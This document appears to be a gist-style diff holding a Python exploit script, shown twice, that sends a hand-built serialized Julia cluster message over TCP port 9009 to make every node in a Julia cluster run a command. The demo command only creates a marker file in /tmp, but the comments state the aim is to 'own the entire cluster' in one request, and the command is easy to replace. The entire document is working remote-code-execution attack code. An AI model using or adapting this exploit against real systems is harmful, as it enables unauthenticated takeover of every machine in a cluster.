yashodhank · January 23, 2017 07:23
diff --git a/Julia_Full_Cluster_Compromise.py b/Julia_Full_Cluster_Compromise.py
 import socket
 import time
 import struct
 from random import randint
  
 TCP_IP = "172.16.195.169"
 TCP_PORT = 9009
  
  
 def send_payload(packet):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TCP_IP, TCP_PORT))
    s.send(packet)
    time.sleep(1)
    s.close()
  
  
 def encode_length(l):
    if l <= 32:
        return chr(l + 126)
    else:
        return "\x09" + struct.pack("<Q", l)
   
 def serialize_command(parts):
    data = "\x16"
    data += chr(len(parts) + 1)
  
    data += "=1\x1f\x02\x05tuple"
    for part in parts:
        data += "\x16\x02=1\x1f\x02\x05tuple&\x15"
        data += encode_length(len(part))
        data += part
  
    return data
   
 # Creates an empty file at /tmp/full_cluster_compromise_confirmed on every computer in the cluster (including the master)
 command = ["touch", "/tmp/full_cluster_compromise_confirmed"]
   
 # Build the payload to own the entire cluster in a single request to one node
 part_0 = '\x11\x01\x02\x07CallMsg#t/+\x01\x00\x00\x00=\x13\x01"\n' + struct.pack(">I", int(time.time()))
 part_1 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1U2\x151\x82\x151\x7f\x151\x81U2~\x151~\x86\x151~\x16\x02;1\x1a\x02\x04none\x7f\x16\x01<1\x16\x04=1\x11\x01\x02\tGlobalRef#s/#/\x02\nremotecall\x7f"\n' + struct.pack(">I", int(time.time()))
 part_2 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1c2\x151\x82\x151\x84\x151\x81c2~\x151\x81\x02\x04#s242\x80\x151\x81\x02\x04#s232\x80\x151\x81\x02\x04#s222\x80\x151\x81d2\x90\x151\x81\x02\x03#s12\x80\x151~\x86\x151~\x16\x1e;1\x1a\x02\x04none\x7f\x16\x02?1\x11\x01\x02\x06GenSym#s/~\x16\x01=1\x11\x01\x02\tGlobalRef#s/#/\x02\x05procs\x16\x02?1\x11\x01\x02\x06GenSym#s/\x7f\x16\x02=1\x1f\x02\x06length\x11\x01\x02\x06GenSym#s/~\x1c~\x16\x02?1\x11\x01\x02\x06GenSym#s/\x81\x16\x03=1\x1f7\x16\x01\x02\rstatic_typeof1\x11\x01\x02\x06GenSym#s/\x82\x11\x01\x02\x06GenSym#s/\x7f\x16\x02?1\x02\x04#s24\x7f\x16\x02?1\x02\x04#s23\x16\x02=1\x1f\x02\x05start\x11\x01\x02\x06GenSym#s/~\x16\x02?1\x02\x04#s22~\x16\x02A1\x16\x03=1\x1f\x02\x02!=\x02\x04#s22\x11\x01\x02\x06GenSym#s/\x7f\x80\x1c\x81\x16\x02?1\x02\x04#s22\x16\x03=1\x1f\x02\x01+\x02\x04#s22\x7f\x16\x02?1\x11\x01\x02\x06GenSym#s/\x83\x16\x03=1\x1f\x02\x04next\x11\x01\x02\x06GenSym#s/~\x02\x04#s23\x16\x02?1\x02\x03#s1\x16\x02=1\x1f\x02\x05start\x11\x01\x02\x06GenSym#s/\x83\x16\x02?1\x11\x01\x02\x06GenSym#s/\x84\x16\x04=1\x1f\x02\x0cindexed_next\x11\x01\x02\x06GenSym#s/\x83\x7f\x02\x03#s1\x16\x02?1d\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x84\x7f\x16\x02?1\x02\x03#s1\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x84\x80\x16\x02?1\x11\x01\x02\x06GenSym#s/\x85\x16\x04=1\x1f\x02\x0cindexed_next\x11\x01\x02\x06GenSym#s/\x83\x80\x02\x03#s1\x16\x02?1\x02\x04#s23\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x85\x7f\x16\x02?1\x02\x03#s1\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x85\x80\x16\x02?1\x11\x01\x02\x06GenSym#s/\x82\x16\x04=1\x11\x01\x02\tGlobalRef#s/#/\x02\nremotecalld"\n' + struct.pack(">I", int(time.time()))
 part_3 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1b2\x151\x82\x151\x7f\x151\x81b2~\x151~~\x151~\x16\x02;1\x1a\x02\x04none\x7f\x16\x01<1\x16\x02=1\x11\x01\x02\tGlobalRef#s/#/\x02\x03run\x16\x02=1\x16\x03=1\x1f\x02\x08getfield#t/\x1e\x02\x07cmd_gen' + serialize_command(command) + '\x151~+\x00\x00\x00\x00{#/}\x16\x01=1\x1f\x02\x05tuple\x16\x02\x02\ttype_goto1~\x11\x01\x02\x06GenSym#s/\x82\x16\x01\x02\x0bboundscheck1{\x16\x04=1\x1f\x02\tsetindex!\x11\x01\x02\x06GenSym#s/\x81\x11\x01\x02\x06GenSym#s/\x82\x02\x04#s24\x16\x01\x02\x0bboundscheck1\x11\x01\x02\tGlobalRef#s/#/\x02\x03pop\x16\x02?1\x02\x04#s24\x16\x03=1\x1f\x02\x01+\x02\x04#s24\x7f\x1c\x82\x16\x02A1\x16\x02=1\x1f\x02\x01!\x16\x03=1\x1f\x02\x02!=\x02\x04#s22\x11\x01\x02\x06GenSym#s/\x7f\x81\x1c\x80\x1c\x7f\x16\x01<1\x11\x01\x02\x06GenSym#s/\x81\x151~+\x00\x00\x00\x00{#/}\x16\x01=1\x1f\x02\x05tuple\x151~+\x00\x00\x00\x00{#/}+\x00\x00\x00\x00\x14\x01/\x14\x02\x7f' + encode_length(int(time.time()))
  
  
 send_payload(part_0 + part_1 + part_2 + part_3)
	import socket
	import time
	import struct
	from random import randint

	TCP_IP = "172.16.195.169"
	TCP_PORT = 9009


	def send_payload(packet):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((TCP_IP, TCP_PORT))
	s.send(packet)
	time.sleep(1)
	s.close()


	def encode_length(l):
	if l <= 32:
	return chr(l + 126)
	else:
	return "\x09" + struct.pack("<Q", l)

	def serialize_command(parts):
	data = "\x16"
	data += chr(len(parts) + 1)

	data += "=1\x1f\x02\x05tuple"
	for part in parts:
	data += "\x16\x02=1\x1f\x02\x05tuple&\x15"
	data += encode_length(len(part))
	data += part

	return data

	# Creates an empty file at /tmp/full_cluster_compromise_confirmed on every computer in the cluster (including the master)
	command = ["touch", "/tmp/full_cluster_compromise_confirmed"]

	# Build the payload to own the entire cluster in a single request to one node
	part_0 = '\x11\x01\x02\x07CallMsg#t/+\x01\x00\x00\x00=\x13\x01"\n' + struct.pack(">I", int(time.time()))
	part_1 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1U2\x151\x82\x151\x7f\x151\x81U2~\x151~\x86\x151~\x16\x02;1\x1a\x02\x04none\x7f\x16\x01<1\x16\x04=1\x11\x01\x02\tGlobalRef#s/#/\x02\nremotecall\x7f"\n' + struct.pack(">I", int(time.time()))
	part_2 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1c2\x151\x82\x151\x84\x151\x81c2~\x151\x81\x02\x04#s242\x80\x151\x81\x02\x04#s232\x80\x151\x81\x02\x04#s222\x80\x151\x81d2\x90\x151\x81\x02\x03#s12\x80\x151~\x86\x151~\x16\x1e;1\x1a\x02\x04none\x7f\x16\x02?1\x11\x01\x02\x06GenSym#s/~\x16\x01=1\x11\x01\x02\tGlobalRef#s/#/\x02\x05procs\x16\x02?1\x11\x01\x02\x06GenSym#s/\x7f\x16\x02=1\x1f\x02\x06length\x11\x01\x02\x06GenSym#s/~\x1c~\x16\x02?1\x11\x01\x02\x06GenSym#s/\x81\x16\x03=1\x1f7\x16\x01\x02\rstatic_typeof1\x11\x01\x02\x06GenSym#s/\x82\x11\x01\x02\x06GenSym#s/\x7f\x16\x02?1\x02\x04#s24\x7f\x16\x02?1\x02\x04#s23\x16\x02=1\x1f\x02\x05start\x11\x01\x02\x06GenSym#s/~\x16\x02?1\x02\x04#s22~\x16\x02A1\x16\x03=1\x1f\x02\x02!=\x02\x04#s22\x11\x01\x02\x06GenSym#s/\x7f\x80\x1c\x81\x16\x02?1\x02\x04#s22\x16\x03=1\x1f\x02\x01+\x02\x04#s22\x7f\x16\x02?1\x11\x01\x02\x06GenSym#s/\x83\x16\x03=1\x1f\x02\x04next\x11\x01\x02\x06GenSym#s/~\x02\x04#s23\x16\x02?1\x02\x03#s1\x16\x02=1\x1f\x02\x05start\x11\x01\x02\x06GenSym#s/\x83\x16\x02?1\x11\x01\x02\x06GenSym#s/\x84\x16\x04=1\x1f\x02\x0cindexed_next\x11\x01\x02\x06GenSym#s/\x83\x7f\x02\x03#s1\x16\x02?1d\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x84\x7f\x16\x02?1\x02\x03#s1\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x84\x80\x16\x02?1\x11\x01\x02\x06GenSym#s/\x85\x16\x04=1\x1f\x02\x0cindexed_next\x11\x01\x02\x06GenSym#s/\x83\x80\x02\x03#s1\x16\x02?1\x02\x04#s23\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x85\x7f\x16\x02?1\x02\x03#s1\x16\x03=1\x1f\x02\x08getfield\x11\x01\x02\x06GenSym#s/\x85\x80\x16\x02?1\x11\x01\x02\x06GenSym#s/\x82\x16\x04=1\x11\x01\x02\tGlobalRef#s/#/\x02\nremotecalld"\n' + struct.pack(">I", int(time.time()))
	part_3 = '\x00\x10\x00\x00\x16\x03:1\x151\x7f\x16\x02>1b2\x151\x82\x151\x7f\x151\x81b2~\x151~~\x151~\x16\x02;1\x1a\x02\x04none\x7f\x16\x01<1\x16\x02=1\x11\x01\x02\tGlobalRef#s/#/\x02\x03run\x16\x02=1\x16\x03=1\x1f\x02\x08getfield#t/\x1e\x02\x07cmd_gen' + serialize_command(command) + '\x151~+\x00\x00\x00\x00{#/}\x16\x01=1\x1f\x02\x05tuple\x16\x02\x02\ttype_goto1~\x11\x01\x02\x06GenSym#s/\x82\x16\x01\x02\x0bboundscheck1{\x16\x04=1\x1f\x02\tsetindex!\x11\x01\x02\x06GenSym#s/\x81\x11\x01\x02\x06GenSym#s/\x82\x02\x04#s24\x16\x01\x02\x0bboundscheck1\x11\x01\x02\tGlobalRef#s/#/\x02\x03pop\x16\x02?1\x02\x04#s24\x16\x03=1\x1f\x02\x01+\x02\x04#s24\x7f\x1c\x82\x16\x02A1\x16\x02=1\x1f\x02\x01!\x16\x03=1\x1f\x02\x02!=\x02\x04#s22\x11\x01\x02\x06GenSym#s/\x7f\x81\x1c\x80\x1c\x7f\x16\x01<1\x11\x01\x02\x06GenSym#s/\x81\x151~+\x00\x00\x00\x00{#/}\x16\x01=1\x1f\x02\x05tuple\x151~+\x00\x00\x00\x00{#/}+\x00\x00\x00\x00\x14\x01/\x14\x02\x7f' + encode_length(int(time.time()))


	send_payload(part_0 + part_1 + part_2 + part_3)